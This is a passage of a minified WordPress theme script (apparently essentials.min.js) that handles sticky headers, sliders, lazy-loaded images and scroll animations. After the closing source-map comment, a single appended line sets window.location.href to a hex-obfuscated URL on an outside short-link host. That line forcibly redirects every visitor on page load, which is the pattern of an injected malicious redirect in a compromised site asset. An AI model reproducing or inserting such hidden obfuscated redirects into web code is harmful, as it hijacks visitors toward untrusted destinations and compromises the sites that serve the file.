M=t(".pix-header-container-area").attr("data-scroll-class"),I=t(".pix-header-container-area").attr("data-scroll-color"),D=t(".pix-header-container-area").attr("data-bg-class"),L=t(".pix-header-container-area").attr("data-bg-color"),Y=!1;t(".pix-is-sticky-header").length&&(Y=!0);let R=!1,X=0,z=A;t(".pix-mobile-header-sticky").length&&t("#mobile_head").length&&(R=!0,X=t("#mobile_head").outerHeight(),z=t("#mobile_head").offset().top),t(".pix-header-container-area .pix-header-text").addClass(E),t(".pix-header-scroll-placeholder").addClass("d-none"),t(".pix-header-scroll-placeholder").css({height:t(".pix-header-normal").height()});let W=!1;function B(){t(".mega-item").each(function(e,i){if(t(i).hasClass("pix-mega-style-default")){let e=t(i).closest(".pix-header-stack"),n=t(i).closest(".pix-topbar");if(e.length||n.length){let e=t(".pix-header-stack > .container:first").width(),n=(window.innerWidth-e)/2;t(i).find("> .dropdown-menu").each(function(i,o){t(o).css({"margin-left":"auto"});let a=-1*(t(o).offset().left-n);t(o).css({width:e,"margin-left":a})})}}else{let e=t(i).offset().left,n=t(i).find(">.dropdown-menu:first");if(n&&n.length){let o=n.width();if(n.hasClass("dropdown-menu-right")){e-o+t(i).width()<0&&n.css({left:0})}else{e+o>window.innerWidth&&n.css({right:0})}}}})}document.addEventListener("scroll",e=>{k&&(t(this).scrollTop()+P>_?t(this).scrollTop()+P>T?t(".pix-floating-meta").addClass("is-hidden"):t(".pix-floating-meta").css({top:P}).removeClass("is-hidden"):t(".pix-floating-meta").css({top:_-t(this).scrollTop()}).removeClass("is-hidden")),R&&(t(this).scrollTop()>A?(X=t("#mobile_head").outerHeight(),t("#mobile_head").addClass("pix-mobile-sticky shadow"),t(".pix-mobile-header-sticky").height(X)):t(this).scrollTop()<A-5&&(t("#mobile_head").removeClass("pix-mobile-sticky shadow"),t(".pix-mobile-header-sticky").height(0))),Y&&(t(this).scrollTop()>A?W||(W=!0,0!=S&&(t(".pix-header-box").css("padding-left",S),t(".pix-header-box").css("padding-right",S)),t(".pix-header").addClass("is-scroll"),t(window).width()>600&&t(".pix-topbar").addClass("pix-hidden"),t(".pix-header-container-area").removeClass(D),t(".pix-header-container-area").addClass(M),t(".pix-header-container-area").css("background",I),t(".pix-header-container-area .pix-header-text").removeClass(E),t(".pix-header-container-area .pix-header-text").addClass(O),t(".pix-header-boxed").addClass("pix-boxed-sticky pix-scroll-shadow"),t(".pix-header-box:not(.pix-no-topbar)").addClass("pix-pt-20"),0!=S&&(t(".pix-header-transparent-full").css("padding-left",S),t(".pix-header-transparent-full").css("padding-right",S)),t(".pix-header-transparent").addClass("pix-transparent-sticky"),t(".pix-header-normal").addClass("pix-normal-sticky"),t(".pix-header-normal").length&&(t(".pix-header-scroll-placeholder").removeClass("d-none"),t(".pix-header-scroll-placeholder").css({height:t(".pix-header-normal").height()}))):t(this).scrollTop()<A-5&&(W=!1,t(".pix-header-normal").length&&t(".pix-header-scroll-placeholder").addClass("d-none"),t(".pix-header").removeClass("is-scroll"),t(".pix-topbar").removeClass("pix-hidden"),t(".pix-header-container-area").removeClass(M),t(".pix-header-container-area").addClass(D),t(".pix-header-container-area").css("background",""),t(".pix-header-container-area").css("background",L),t(".pix-header-container-area .pix-header-text").removeClass(O),t(".pix-header-container-area .pix-header-text").addClass(E),t(".pix-header-boxed").removeClass("pix-boxed-sticky pix-scroll-shadow"),t(".pix-header-box:not(.pix-no-topbar)").removeClass("pix-pt-20"),0!=S&&(t(".pix-header-box").css("padding-left",""),t(".pix-header-box").css("padding-right","")),t(".pix-header-transparent").removeClass("pix-transparent-sticky"),t(".pix-header-normal").removeClass("pix-normal-sticky"),0!=S&&(t(".pix-header-transparent-full").css("padding-left",""),t(".pix-header-transparent-full").css("padding-right",""))))},{passive:!0}),B(),window.addEventListener("resize",B),setTimeout(function(){var e=t(".shape-overlays")[0],i=new ShapeOverlays(e);t(".shape-overlays").addClass("d-none"),t(".pix-overlay").addClass("d-none"),t("body").on("click",".pix-search-btn",function(e){if(e.preventDefault(),t(".shape-overlays").removeClass("d-none"),t(".pix-overlay").removeClass("d-none"),i){if(i.isAnimating)return!1;i.toggle(),setTimeout(function(){t(".pix-overlay-item").toggleClass("is-opened")},20)}return t(".pix-search-input").focus(),!1}),t(".pix-search-close").on("click",function(e){if(e.preventDefault(),i){if(i.isAnimating)return!1;i.toggle(),t(".pix-overlay-item").toggleClass("is-opened"),setTimeout(function(){t(".shape-overlays").addClass("d-none"),t(".pix-overlay").addClass("d-none")},1e3)}return!1}),t(document).keyup(function(e){i&&i.isOpened&&27===e.keyCode&&t(".pix-search-close").click()})},0),window.innerWidth>i?t("body").hasClass("pix-sections-stack")&&!window.vc_iframe&&(t("body").hasClass("elementor-page")?t(".site-main .elementor-section-wrap > section, .site-main .elementor-section-wrap > div, .site-footer2").stack():t(".site-content section, .site-footer2").stack(),t(".pix-cookie-banner").length&&pix_animation_display(t(".pix-cookie-banner"),!0)):t("body").removeClass("pix-sections-stack"),setTimeout(function(){pix_section_stack()},500),window.innerWidth>i?t(".pix-sticky-footer").pixfooter():t(".pix-sticky-footer").removeClass("pix-sticky-footer"),t(".pix-main-slider.clients").each(function(e,i){new Waypoint({element:i,offset:"100%",triggerOnce:!0,handler:function(){t(".pix-main-slider").flickity("resize"),setTimeout(function(){t(".pix-main-slider").flickity("resize")},500),this.destroy()}})}),t(".pix-open-sidebar").on("click",function(e){return e.preventDefault(),t(".pix-sidebar").addClass("opened"),!1}),t(".pix-close-sidebar").on("click",function(e){return e.preventDefault(),t(".pix-sidebar").removeClass("opened"),!1}),t(".pix-banner-close").on("click",function(e){e.preventDefault();var i=t(this).attr("href"),n=t(this).closest(".pix-banner");return t.ajax({url:i,method:"GET"}).done(function(t){}).fail(function(){}),n.addClass("pix-closed"),!1}),t(".pix-cookies-close").on("click",function(e){e.preventDefault();var i=t(this).attr("href"),n=t(this).closest(".pix-cookie-banner");return t.ajax({url:i,method:"GET"}).done(function(t){}).fail(function(){}),pixfort_main_object.hasOwnProperty("datacookiesId")&&(localStorage.setItem("pix_cookiesbanner",pixfort_main_object.datacookiesId),console.log("set")),n.addClass("pix-closed"),!1}),t(".widget_nav_menu .menu > .menu-item.menu-item-has-children > a").on("click",function(e){return e.preventDefault(),t(this).parent().toggleClass("active"),t(this).parent().find(".sub-menu").slideToggle(300,"linear"),!1}),setTimeout(()=>document.body.classList.add("render"),0),setTimeout(function(){if(t("body").hasClass(" vc_editor compose-mode"))return!1;piximations.init(),pix_countdown(),pixLoadMaps(),init_chart(),update_collapse(),update_numbers(),update_masonry(),init_bars(),init_scroll_rotate(),init_fancy_mockup(),init_portfolio(),video_element(),pix_init_c7(),init_tilts(),init_Parallax(),init_Parallax(),pix_animation(),pixLazy(),t(".pix_tabs_btns").each(function(e,i){t(i).find(".nav-item:first a").tab("show")}),t("body").on("click",'a[data-toggle="pill"]',function(e){t(this).closest(".pix_tabs_btns").find(".nav-link").removeClass("active")}),t(".pix-contact7-form").each(function(e,i){t('input[type="text"], input[type="email"], input[type="phone"], input[type="password"], textarea').each(function(e,i){t(i).addClass("form-control"),t(i).closest("p").addClass("form-group")})}),t(".vc_controls-out-tl").each(function(e,i){t(i).offset().top<0&&t(i).css({top:"-17px"})})},0),setTimeout(function(){pixLoadImgs()},3e3),jQuery(document.body).on("post-load",function(t){pix_animation()}),t(".jarallax-video").each(function(){let e=!1;if(!t(this).attr("data-pix-bg-video"))return!1;e=t(this).attr("data-pix-bg-video"),t(this).jarallax({speed:.4,videoSrc:e})}),setTimeout(function(){t(".pix-video-elem source").each(function(){if(t(this).parents(".navbar").length)return!1;var e=t(this).attr("data-src");t(this).attr("src",e);var i=this.parentElement;i.load(),i.play()})},1e4);let H=!0;t(".navbar").hover(function(e){H&&(t(this).find(".pix-video-elem source").each(function(){var e=t(this).attr("data-src");t(this).attr("src",e);var i=this.parentElement;i.load(),i.play()}),H=!1)}),t(".intro-jarallax").jarallax({speed:.4,imgSize:"object-fit",imgPosition:"object-position"}),t(".pix-shape-dividers").each(function(){if(!t(this).hasClass("loaded")){new dividerShapes(this).initPoints(),t(this).addClass("loaded")}}),o(),pix_init_particles(),window.onpageshow=function(t){t.persisted&&document.body.classList.add("render")},t("body").addClass("pix-loaded"),setTimeout(()=>document.body.classList.add("render"),0),setTimeout(()=>t(".pix-loading-circ-path").remove(),600),NProgress.done()}),document.addEventListener("DOMContentLoaded",function(){let t=[].slice.call(document.querySelectorAll("img.pix-lazy")),e=!1;const i=function(){!1===e&&(e=!0,setTimeout(function(){t.forEach(function(e){e.getBoundingClientRect().top<=window.innerHeight&&e.getBoundingClientRect().bottom>=0&&(e.src=e.dataset.src,e.dataset.srcset&&(e.srcset=e.dataset.srcset),e.classList.remove("pix-lazy"),0===(t=t.filter(function(t){return t!==e})).length&&(document.removeEventListener("scroll",i),window.removeEventListener("resize",i),window.removeEventListener("orientationchange",i)))}),e=!1},200))};window.pixLazy=function(){i()},document.addEventListener("scroll",i),window.addEventListener("resize",i),window.addEventListener("orientationchange",i)}),window.pixLoadImgs=function(){let t=[].slice.call(document.querySelectorAll("img.pix-lazy"));t.forEach(function(e){e.src=e.dataset.src,e.classList.remove("pix-lazy"),t=t.filter(function(t){return t!==e})})},window.pixInitJs=async function(e){t("body").hasClass("vc_editor")&&(piximations.init(),e||(e=t("body")),e.find('[data-toggle="tooltip"]').tooltip(),t(".vc_controls-out-tl").each(function(e,i){t(i).offset().top<0&&t(i).css({top:"-17px"})}),e.find(".pix-contact7-form").each(function(e,i){t('input[type="text"], input[type="email"], input[type="phone"], input[type="password"], textarea').each(function(e,i){t(i).addClass("form-control"),t(i).closest("p").addClass("form-group")})}),e.find(".pix-shape-dividers").each(function(){if(!t(this).hasClass("loaded")){new dividerShapes(this).initPoints(),t(this).addClass("loaded")}}),o())},window.pix_init_particles=async function(){window.innerWidth<600&&n(),t(window).resize(function(){window.innerWidth<600?n():t(".pix-scene").css("display","block")})},window.pix_cb_fn=async function(t){setTimeout(t,0)},window.pix_init_c7=async function(){t(".pix-contact7-form").each(function(e,i){t('input[type="text"], input[type="email"], input[type="phone"], input[type="password"], select, textarea').each(function(e,i){t(i).addClass("form-control"),t(i).closest("p").addClass("form-group")})})},window.update_masonry=async function(e){e||(e=t("body")),e.find(".pix_masonry").length&&window.pixLoadIsotope(function(){e.find(".pix_masonry").each(function(e,i){setTimeout(function(){t(i).isotope({itemSelector:".grid-item",percentPosition:!0,resize:!0,masonry:{columnWidth:".grid-sizer",gutter:".gutter-sizer"}})},200),setTimeout(function(){t(i).isotope("reloadItems"),pix_animation(!1,!0)},1900)})})},window.init_fancy_mockup=async function(e){e||(e=t("body")),e.find(".pix-fancy-mockup").each(function(e,i){var n=t(i).find(".pix-fancy-device-img"),o=t(i).find(".pix-fancy-content img"),a=(t(i).offset().top,t(i).outerHeight(),i.getBoundingClientRect()),s=t(window).height(),r=t(window).height()/4,l=s-r,d=(t(window).scrollTop(),t(window).height(),(a.top-r)/l),c=80*d,p=100*d,u=.9+.1*(1-d);o.css({transform:"translate3d(0px, "+p+"px, 0px) scale3d(1, "+u+", 1) rotateX("+c+"deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg)"}),n.css({transform:"translate3d(0px, "+p+"px, 2px) scale3d(1, "+u+", 1) rotateX("+c+"deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg)"}),document.addEventListener("scroll",t=>{if((a=i.getBoundingClientRect()).top<=s&&a.top>=r){var e=(a.top-r)/l,d=80*e,c=100*e,p=.9+.1*(1-e);o.css({transform:"translate3d(0px, "+c+"px, 0px) scale3d(1, "+p+", 1) rotateX("+d+"deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg)","-webkit-transform":"translate3d(0px, "+c+"px, 0px) scale3d(1, "+p+", 1) rotateX("+d+"deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg)"}),n.css({transform:"translate3d(0px, "+c+"px, 2px) scale3d(1, "+p+", 1) rotateX("+d+"deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg)","-webkit-transform":"translate3d(0px, "+c+"px, 2px) scale3d(1, "+p+", 1) rotateX("+d+"deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg)"})}else a.top>s?(o.css({transform:"translate3d(0px, 100px, 0px) scale3d(1, 0.9, 1) rotateX(80deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg)","-webkit-transform":"translate3d(0px, 100px, 0px) scale3d(1, 0.9, 1) rotateX(80deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg)"}),n.css({transform:"translate3d(0px, 100px, 2px) scale3d(1, 0.9, 1) rotateX(80deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg)","-webkit-transform":"translate3d(0px, 100px, 2px) scale3d(1, 0.9, 1) rotateX(80deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg)"})):(o.css({transform:"translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg)","-webkit-transform":"translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg)"}),n.css({transform:"translate3d(0px, 0px, 2px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg)","-webkit-transform":"translate3d(0px, 0px, 2px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg)"}))},{passive:!0})})},window.init_portfolio=async function(e){(t(".portfolio_grid").length||t(".portfolio_filter").length)&&window.pixLoadIsotope(function(){e||(e=t("body")),t(".portfolio_grid").isotope({itemSelector:".grid-item",resize:!0,packery:{gutter:0}}),t(".portfolio_filter").click(function(e){e.preventDefault();var i=t(this),n=i.data("category"),o=i.closest(".pix-portfolio").find(".portfolio_grid");return t(this).closest(".pix-portfolio-nav").find(".portfolio_filter").removeClass("is-checked"),t(this).addClass("is-checked"),o.isotope({itemSelector:".grid-item",filter:n}),window.pix_animation_display(o),!1}),setTimeout(function(){window.pix_animation(t(".portfolio_grid"),!0)},1500)})},window.pixParallax=[],window.init_Parallax=async function(){if(t("body").hasClass("vc_editor")){if(void 0===window.vc)return!1;if(!window.vc.loaded)return!1}t(".scene").each(function(){var t=new Parallax(this,{relativeInput:!0});window.pixParallax.push(t)}),t(".pix-scene").each(function(){t(this).find(".pix-scene-particle").attr("data-pix-depth");var e=new Parallax(this,{relativeInput:!0,friction:.2});window.pixParallax.push(e)})},window.destroy_Parallax=async function(){window.pixParallax.forEach(function(t){t.destroy();var e=window.pixParallax.indexOf(t);e>-1&&window.pixParallax.splice(e,1)})},window.init_tilts=async function(e){e||(e=t("body")),/^((?!chrome|android).)*safari/i.test(navigator.userAgent)||(e.find(".tilt").each(function(e,i){t(i).universalTilt({base:window,reset:!0,scale:1.04,reverse:!1,max:15,perspective:3e3,speed:4e3})}),e.find(".tilt_small").each(function(e,i){t(i).universalTilt({reset:!0,scale:1.01,reverse:!1,max:15,perspective:5e3,speed:4e3})}),e.find(".tilt_big").each(function(e,i){t(i).universalTilt({reset:!0,scale:1.07,reverse:!1,max:15,perspective:1e3,speed:4e3})}))},window.update_collapse=async function(){t(".collapse").each(function(e,i){var n=t(i).closest(".accordion");n.attr("id")&&""!=n.attr("id")&&t(i).attr("data-parent","#"+n.attr("id"))})},window.init_scroll_rotate=async function(e){e||(e=t("body")),e.find(".pix-rotate-scroll").each(function(){var e=t(this),i=e.attr("data-speed");i&&""!=i||(i=300),document.addEventListener("scroll",n=>{var o="rotate("+t(window).scrollTop()/i+"rad)";e.css({"-webkit-transform":o,"-moz-transform":o,transform:o})},{passive:!0})})},window.video_element=async function(e){e||(e=t("body")),e.find("video.pix-video-bg-element").each(function(t,e){var i=this;new Waypoint({element:e,offset:"100%",triggerOnce:!0,handler:function(){i.paused&&i.play(),this.destroy()}})})},window.init_bars=async function(){t(".pix-progress:not(.pix_ready)").each(function(e,i){t(i).addClass("pix_ready");new Waypoint({element:i,offset:"100%",triggerOnce:!0,handler:function(){var e=t(i).find(".progress-bar");t(e).animate({width:t(e).attr("aria-valuenow")+"%"},1e3);var n=t(i).find(".pix-progress-counter"),o=0;n.attr("data-counter")&&""!=n.attr("data-counter")&&(o=Math.floor(n.attr("data-counter"))),t({property:0}).animate({property:o},{duration:1600,easing:"swing",step:function(){n.text(Math.floor(this.property)+"%")},complete:function(){n.text(this.property+"%")}}),this.destroy()}})})},window.update_numbers=async function(){t(".animate-math .number").each(function(e,i){new Waypoint({element:i,offset:"100%",triggerOnce:!0,handler:function(){var e=t(i),n=Math.floor(1e3*Math.random()+3e3);e.attr("data-duration")&&""!=e.attr("data-duration")&&(n=Math.floor(e.attr("data-duration")));var o=e.attr("data-to");t({property:0}).animate({property:o},{duration:n,easing:"swing",step:function(){e.text(Math.floor(this.property))},complete:function(){e.text(this.property)}}),this.destroy()}})})},window.init_chart=async function(e){e||(e=t("body")),e.find(".chart:not(.pix-loaded)").each(function(e,i){t(i).addClass("pix-loaded");var n="rgba(0,0,0,0.03)";t(i).attr("data-track")&&""!=t(i).attr("data-track")&&(n=t(i).attr("data-track"));new Waypoint({element:i,offset:"100%",triggerOnce:!0,handler:function(){t(this.element).attr("data-color");t(this.element).easyPieChart({animate:1e3,barColor:function(e){var i="";if(t(this.el).attr("data-gradient-1")){var n=this.renderer.getCtx();this.renderer.getCanvas();(i=n.createRadialGradient(0,0,100,100,70,70)).addColorStop(0,t(this.el).attr("data-gradient-1")),t(this.el).attr("data-gradient-3")&&""!=t(this.el).attr("data-gradient-3")?(i.addColorStop(.5,t(this.el).attr("data-gradient-2")),i.addColorStop(1,t(this.el).attr("data-gradient-3"))):i.addColorStop(1,t(this.el).attr("data-gradient-2"))}else i=t(this.el).attr("data-barColor");return i},trackColor:n,lineCap:"round",lineWidth:18,size:140,scaleColor:!1,onStep:function(e,i,n){t(this.el).find(".number").text(Math.round(n))}})}})})},window.pix_sliders=function(){(t(".pix-slider").length>0||t(".pix-slider-nav-full").length>0)&&(t(".pix-slider").each(function(e,i){var n={};t(i).attr("data-flickity")&&(n=JSON.parse(t(i).attr("data-flickity"))),n.draggable=!0,n.adaptiveHeight=!0,n.prevNextButtons=!1,n.imagesLoaded=!0,n.contain=!0,n.resize=!0,n.ready=function(){setTimeout(function(){t(".pix-slider").flickity("resize")},900)},n.on={ready:function(){setTimeout(function(){t(".pix-slider").flickity("resize")},900)}},t(i).flickity(n)}),setTimeout(function(){t(".pix-slider-nav-full").each(function(e,i){var n=!1,o="center";t(i).attr("data-slider")&&(t(i).attr("data-nav-align")&&(o=t(i).attr("data-nav-align")),n=t(i).attr("data-slider"),t(i).flickity({asNavFor:n,cellAlign:o,prevNextButtons:!1,contain:!0,pageDots:!1,on:{ready:function(){setTimeout(function(){t(i).flickity("resize")},1200)}}}))})},500))},pix_sliders(),window.pix_main_slider=function(e){(e||(e=t("body")),e.find(".pix-main-slider").length>0)&&e.find(".pix-main-slider").each(function(e,i){t(i).hasClass("flickity-enabled")&&t(i).flickity("destroy");var n={};if(t(i).attr("data-flickity")&&(n=JSON.parse(t(i).attr("data-flickity"))),n.draggable=!0,n.adaptiveHeight&&(n.adaptiveHeight=!0),n.resize=!0,n.imagesLoaded=!0,n.arrowShape="M83.7718595,45.4606514 L31.388145,45.4606514 L54.2737785,23.1973134 C56.1027533,21.4180712 56.1027533,18.4982892 54.2737785,16.719047 C52.4448037,14.9398048 49.4903059,14.9398048 47.6613311,16.719047 L16.7563465,46.7836776 C14.9273717,48.5629198 14.9273717,51.4370802 16.7563465,53.2163224 L47.6613311,83.280953 C49.4903059,85.0601952 52.4448037,85.0601952 54.2737785,83.280953 C56.1027533,81.5017108 56.1027533,78.6275504 54.2737785,76.8483082 L31.388145,54.5849702 L83.7718595,54.5849702 C86.3511829,54.5849702 88.4615385,52.5319985 88.4615385,50.0228108 C88.4615385,47.5136231 86.3511829,45.4606514 83.7718595,45.4606514 Z",t(i).on("ready.flickity",function(){n.pix_id&&t(n.pix_id).hasClass("flickity-enabled")&&setTimeout(function(){t(n.pix_id).flickity("resize")},500),n.pix_id&&t(n.pix_id).hasClass("flickity-enabled")&&setTimeout(function(){t(n.pix_id).flickity("resize")},1500),setTimeout(function(){t(i).addClass("pix-slider-loaded")},100)}),t(i).flickity(n),n.slider_effect){var o="";n.slider_style&&(o=n.slider_style),t(i).closest(".vc_row:not(.overflow-visible)").removeClass("vc_row_visible").addClass("overflow-hidden").css({overflow:"hidden !important"}),t(i).closest(".elementor-top-section").addClass("overflow-hidden").css({overflow:"hidden !important"});t(i).on("scroll.flickity",function(e,a){var s=t(i).width();if(t(window).width()<600)return!1;var r=t(i).offset().left,l=t(i).find(".carousel-cell").width();if(!t(i).data("flickity")||!t(i).data("flickity").slides)return!1;t(i).data("flickity").slides.forEach(function(e,a){var d=t(i).find(".carousel-cell:nth-child("+(a+1)+")"),c=t(e.cells[0].element).offset().left,p=1,u=0,h=0,f=0,m=10,y="auto";c-r<0?("pix-circular-slider"==n.slider_effect||"pix-circular-left"==n.slider_effect||"pix-fade-out-effect"==n.slider_effect?((p=1+(c-r)/l)<0&&(p=0),p>1&&(p=1),"pix-fade-out-effect"!=n.slider_effect&&(u=20*(1-p),h=1.8*(-1*c+r),f=(r-c)/l*-180,1-.1*(1-p))):"pix-opacity-slider"==o&&((p=1+(c-r)/l)<.3&&(p=.3),p>1&&(p=1)),p<.1&&(p=0),c-r<-10&&(y="none"),m=-1):c>r+s-l+1&&(y="none","pix-circular-slider"==n.slider_effect||"pix-circular-right"==n.slider_effect||"pix-fade-out-effect"==n.slider_effect?((p=(r+s-c)/l)<0&&(p=0),p>1&&(p=1),"pix-fade-out-effect"!=n.slider_effect&&(u=-1*(1-p)*20,h=-1*(1-p)*2.2*l*.82,f=-1*(1-p)*l*.52,1-.1*(1-p))):"pix-opacity-slider"==o&&((p=(r+s-c)/l)<.3&&(p=.3),p>1&&(p=1)),m=-1,p<.2&&(p=0)),d.find(".slide-inner").css({transform:"perspective("+l+"px) translateX("+h+"px) rotateY("+u+"deg) translateZ( "+f+"px)","-webkit-transform":"perspective("+l+"px) translateX("+h+"px) rotateY("+u+"deg) translateZ( "+f+"px)","-moz-transform":"perspective("+l+"px) translateX("+h+"px) rotateY("+u+"deg) translateZ( "+f+"px)"}),"pix-circular-slider"!=n.slider_effect&&"pix-circular-right"!=n.slider_effect&&"pix-circular-left"!=n.slider_effect&&"pix-fade-out-effect"!=n.slider_effect||d.css({opacity:p,"z-index":m}),d.css({"pointer-events":y}),d.parent().css({"pointer-events":y})})})}})},window.pix_main_slider(),window.pix_countdown=async function(e){e||(e=t("body")),e.find(".pix-countdown:not(.pix-count-loaded)").length&&e.find(".pix-countdown:not(.pix-count-loaded)").each(function(e,i){var n=t(i).attr("data-date");t(i).countdown({date:n,render:function(e){t.each(e,function(e,n){t(i).find(".pix-count-"+e).html(n)})},onEnd:function(){t(this.el).attr("data-redirect")&&(t("body").hasClass("compose-mode")||t("body").hasClass("elementor-editor-active")||(window.location.href=t(this.el).attr("data-redirect")))}}),t(i).addClass("pix-count-loaded")})},window.pix_animation_display=async function(e=!1){e||(e=t("body"));var i=["fade-in-Img","fade-in-down","fade-in-left","fade-in-up","fade-in-up-big","fade-in-right-big","fade-in-left-big","highlight-grow","slide-in-up"];e.find(".animate-in").each(function(e,n){var o=t(n).attr("data-anim-type"),a=t(n).attr("data-anim-delay");t(n).addClass("pix-waiting"),t(n).hasClass("animate-in")&&!t(n).hasClass("animating-init")&&(t(n).addClass("animating-init"),setTimeout(function(){t(n).addClass("animating").addClass(o).removeClass("animate-in")},a),t(n).one("webkitAnimationEnd mozAnimationEnd MSAnimationEnd oanimationend animationend transitionend webkitTransitionEnd oTransitionEnd",function(){t(n).removeClass("animating animating-init").removeClass(i.join(" ")).addClass("animated")}))})},window.pix_animation=async function(e=!1,n=!1){var o=["fade-in-Img","fade-in-down","fade-in-left","fade-in-up","fade-in-up-big","fade-in-right-big","fade-in-left-big","highlight-grow","slide-in-up"];e||(e=t("body"));var a=":not(.pix-waiting)";n&&(a=""),e.find(".animate-in"+a).each(function(e,n){var a=!0,s="100%";if(t("body").hasClass("pix-sections-stack")&&!t("body").hasClass("vc_editor")&&window.innerWidth>i&&t(n).closest("section").length>0){a=!1;s="200%";if(!t(n).closest("section").hasClass("is-sticky-active")&&t(n).closest(".site-footer2").length<1)return!1}var r=t(n).attr("data-anim-type"),l=t(n).attr("data-anim-delay");t(n).addClass("pix-waiting");new Waypoint({element:n,offset:s,triggerOnce:a,handler:function(){t(n).hasClass("animate-in")&&!t(n).hasClass("animating-init")&&(t(n).addClass("animating-init"),setTimeout(function(){t(n).addClass("animating").addClass(r).removeClass("animate-in")},l),t(n).one("webkitAnimationEnd mozAnimationEnd MSAnimationEnd oanimationend animationend transitionend webkitTransitionEnd oTransitionEnd",function(){t(n).removeClass("animating animating-init").removeClass(o.join(" ")).addClass("animated")})),this.destroy()}})})},window.isInViewport=function(t){var e=t.getBoundingClientRect();return e.top>=-10&&e.bottom<=(window.innerHeight||document.documentElement.clientHeight)+10}}(jQuery);
//# sourceMappingURL=essentials.min.js.map
window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";